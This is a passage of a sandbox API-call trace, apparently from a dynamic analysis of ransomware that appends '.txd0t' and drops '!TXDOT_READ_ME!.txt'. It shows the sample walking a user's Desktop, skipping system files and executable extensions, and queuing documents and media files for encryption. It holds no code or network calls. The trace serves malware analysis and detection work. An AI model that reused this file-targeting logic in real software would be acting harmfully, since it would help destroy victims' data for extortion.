returned 1 [0072.664] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.664] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.664] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.664] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\3475V2DB.pdf" [0072.664] SetEvent (hEvent=0x3fc) returned 1 [0072.680] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x355c0030, ftCreationTime.dwHighDateTime=0x1d5e176, ftLastAccessTime.dwLowDateTime=0xab01ed50, ftLastAccessTime.dwHighDateTime=0x1d5e193, ftLastWriteTime.dwLowDateTime=0xab01ed50, ftLastWriteTime.dwHighDateTime=0x1d5e193, nFileSizeHigh=0x0, nFileSizeLow=0x11934, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5dJ40KpaZH5gABK Wvl.xls", cAlternateFileName="5DJ40K~1.XLS")) returned 1 [0072.680] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2=".") returned 1 [0072.680] StrCmpW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="..") returned 1 [0072.680] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.680] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.680] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5dJ40KpaZH5gABK Wvl.xls", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls") returned="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" [0072.680] PathFindExtensionW (pszPath="5dJ40KpaZH5gABK Wvl.xls") returned=".xls" [0072.680] StrCmpW (psz1=".xls", psz2=".txd0t") returned 1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="bootsect.bak") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="iconcache.db") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="thumbs.db") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2=" ransomware ") returned 1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2=" ransom ") returned 1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="debug.txt") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="boot.ini") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="desktop.ini") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="autorun.inf") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="ntuser.dat") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="ntldr") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="ntdetect.com") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="bootfont.bin") returned -1 [0072.680] StrCmpIW (psz1="5dJ40KpaZH5gABK Wvl.xls", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.680] PathFindExtensionW (pszPath="5dJ40KpaZH5gABK Wvl.xls") returned=".xls" [0072.680] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".xls") returned 0x0 [0072.680] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.680] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.680] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.681] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.681] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5dJ40KpaZH5gABK Wvl.xls" [0072.681] SetEvent (hEvent=0x3fc) returned 1 [0072.690] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26738d40, ftCreationTime.dwHighDateTime=0x1d5eddd, ftLastAccessTime.dwLowDateTime=0x866074e0, ftLastAccessTime.dwHighDateTime=0x1d5e9ad, ftLastWriteTime.dwLowDateTime=0x866074e0, ftLastWriteTime.dwHighDateTime=0x1d5e9ad, nFileSizeHigh=0x0, nFileSizeLow=0x11b96, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="5WpFV5we BjOWCFQ_8P.png", cAlternateFileName="5WPFV5~1.PNG")) returned 1 [0072.690] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2=".") returned 1 [0072.690] StrCmpW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="..") returned 1 [0072.690] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.690] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.691] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5WpFV5we BjOWCFQ_8P.png", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png") returned="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" [0072.691] PathFindExtensionW (pszPath="5WpFV5we BjOWCFQ_8P.png") returned=".png" [0072.691] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="bootsect.bak") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="iconcache.db") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="thumbs.db") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2=" ransomware ") returned 1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2=" ransom ") returned 1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="debug.txt") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="boot.ini") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="desktop.ini") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="autorun.inf") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="ntuser.dat") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="ntldr") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="ntdetect.com") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="bootfont.bin") returned -1 [0072.691] StrCmpIW (psz1="5WpFV5we BjOWCFQ_8P.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.691] PathFindExtensionW (pszPath="5WpFV5we BjOWCFQ_8P.png") returned=".png" [0072.691] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.691] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.691] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.691] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.691] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.691] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png" [0072.691] SetEvent (hEvent=0x3fc) returned 1 [0072.695] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376e3d90, ftCreationTime.dwHighDateTime=0x1d5e688, ftLastAccessTime.dwLowDateTime=0x485dd3a0, ftLastAccessTime.dwHighDateTime=0x1d5e24f, ftLastWriteTime.dwLowDateTime=0x485dd3a0, ftLastWriteTime.dwHighDateTime=0x1d5e24f, nFileSizeHigh=0x0, nFileSizeLow=0x47f1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="7SFq.jpg", cAlternateFileName="")) returned 1 [0072.695] StrCmpW (psz1="7SFq.jpg", psz2=".") returned 1 [0072.695] StrCmpW (psz1="7SFq.jpg", psz2="..") returned 1 [0072.695] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.695] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.696] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="7SFq.jpg", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg") returned="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" [0072.696] PathFindExtensionW (pszPath="7SFq.jpg") returned=".jpg" [0072.696] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="bootsect.bak") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="iconcache.db") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="thumbs.db") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2=" ransomware ") returned 1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2=" ransom ") returned 1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="debug.txt") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="boot.ini") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="desktop.ini") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="autorun.inf") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="ntuser.dat") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="ntldr") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="ntdetect.com") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="bootfont.bin") returned -1 [0072.700] StrCmpIW (psz1="7SFq.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.700] PathFindExtensionW (pszPath="7SFq.jpg") returned=".jpg" [0072.701] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0072.701] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.701] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.701] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.701] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.701] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg" [0072.701] SetEvent (hEvent=0x3fc) returned 1 [0072.708] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61556450, ftCreationTime.dwHighDateTime=0x1d5e686, ftLastAccessTime.dwLowDateTime=0xaf323a40, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0xaf323a40, ftLastWriteTime.dwHighDateTime=0x1d5e177, nFileSizeHigh=0x0, nFileSizeLow=0x2ef9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8dOKYe-qP.odt", cAlternateFileName="8DOKYE~1.ODT")) returned 1 [0072.708] StrCmpW (psz1="8dOKYe-qP.odt", psz2=".") returned 1 [0072.708] StrCmpW (psz1="8dOKYe-qP.odt", psz2="..") returned 1 [0072.708] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.708] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="8dOKYe-qP.odt", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt") returned="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" [0072.708] PathFindExtensionW (pszPath="8dOKYe-qP.odt") returned=".odt" [0072.708] StrCmpW (psz1=".odt", psz2=".txd0t") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="bootsect.bak") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="iconcache.db") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="thumbs.db") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2=" ransomware ") returned 1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2=" ransom ") returned 1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="debug.txt") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="boot.ini") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="desktop.ini") returned -1 [0072.708] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="autorun.inf") returned -1 [0072.709] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="ntuser.dat") returned -1 [0072.709] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="ntldr") returned -1 [0072.709] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="ntdetect.com") returned -1 [0072.709] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="bootfont.bin") returned -1 [0072.709] StrCmpIW (psz1="8dOKYe-qP.odt", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.709] PathFindExtensionW (pszPath="8dOKYe-qP.odt") returned=".odt" [0072.709] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".odt") returned 0x0 [0072.709] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.709] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.709] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.709] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.709] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt" [0072.709] SetEvent (hEvent=0x3fc) returned 1 [0072.715] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177c8af0, ftCreationTime.dwHighDateTime=0x1d5e304, ftLastAccessTime.dwLowDateTime=0x2eadcbd0, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x2eadcbd0, ftLastWriteTime.dwHighDateTime=0x1d5e25f, nFileSizeHigh=0x0, nFileSizeLow=0x14703, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aqQlS_nJ46AyT-L-zj.swf", cAlternateFileName="AQQLS_~1.SWF")) returned 1 [0072.715] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2=".") returned 1 [0072.715] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="..") returned 1 [0072.715] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.715] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="aqQlS_nJ46AyT-L-zj.swf", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf") returned="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" [0072.715] PathFindExtensionW (pszPath="aqQlS_nJ46AyT-L-zj.swf") returned=".swf" [0072.716] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="bootsect.bak") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="iconcache.db") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="thumbs.db") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2=" ransomware ") returned 1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2=" ransom ") returned 1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="debug.txt") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="boot.ini") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="desktop.ini") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="autorun.inf") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="ntuser.dat") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="ntldr") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="ntdetect.com") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="bootfont.bin") returned -1 [0072.716] StrCmpIW (psz1="aqQlS_nJ46AyT-L-zj.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.716] PathFindExtensionW (pszPath="aqQlS_nJ46AyT-L-zj.swf") returned=".swf" [0072.716] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0072.716] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.716] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.716] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.716] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.716] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf" [0072.716] SetEvent (hEvent=0x3fc) returned 1 [0072.725] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87888bb0, ftCreationTime.dwHighDateTime=0x1d5e20e, ftLastAccessTime.dwLowDateTime=0xae94e950, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0xae94e950, ftLastWriteTime.dwHighDateTime=0x1d5e51b, nFileSizeHigh=0x0, nFileSizeLow=0x928a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="BBeZnteC-7.mp3", cAlternateFileName="BBEZNT~1.MP3")) returned 1 [0072.725] StrCmpW (psz1="BBeZnteC-7.mp3", psz2=".") returned 1 [0072.725] StrCmpW (psz1="BBeZnteC-7.mp3", psz2="..") returned 1 [0072.725] StrCpyNW (in: psz1=0xed31f0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0072.725] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0072.725] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="BBeZnteC-7.mp3", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3") returned="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" [0072.725] PathFindExtensionW (pszPath="BBeZnteC-7.mp3") returned=".mp3" [0072.725] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="bootsect.bak") returned -1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="iconcache.db") returned -1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="thumbs.db") returned -1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2=" ransomware ") returned 1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2=" ransom ") returned 1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="debug.txt") returned -1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="boot.ini") returned -1 [0072.725] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="desktop.ini") returned -1 [0072.726] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="autorun.inf") returned 1 [0072.726] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="ntuser.dat") returned -1 [0072.726] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="ntldr") returned -1 [0072.726] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="ntdetect.com") returned -1 [0072.726] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="bootfont.bin") returned -1 [0072.726] StrCmpIW (psz1="BBeZnteC-7.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.726] PathFindExtensionW (pszPath="BBeZnteC-7.mp3") returned=".mp3" [0072.726] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0072.726] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0072.726] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0072.726] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.731] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.731] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" [0072.731] SetEvent (hEvent=0x408) returned 1 [0072.734] FindNextFileW (in: hFindFile=0xec20f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3c340, ftCreationTime.dwHighDateTime=0x1d5e121, ftLastAccessTime.dwLowDateTime=0x9bb095a0, ftLastAccessTime.dwHighDateTime=0x1d5e9f8, ftLastWriteTime.dwLowDateTime=0x9bb095a0, ftLastWriteTime.dwHighDateTime=0x1d5e9f8, nFileSizeHigh=0x0, nFileSizeLow=0x5354, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Cb9DBpMZ2 ZiZd.jpg", cAlternateFileName="CB9DBP~1.JPG")) returned 1 [0072.734] StrCmpW (psz1="Cb9DBpMZ2 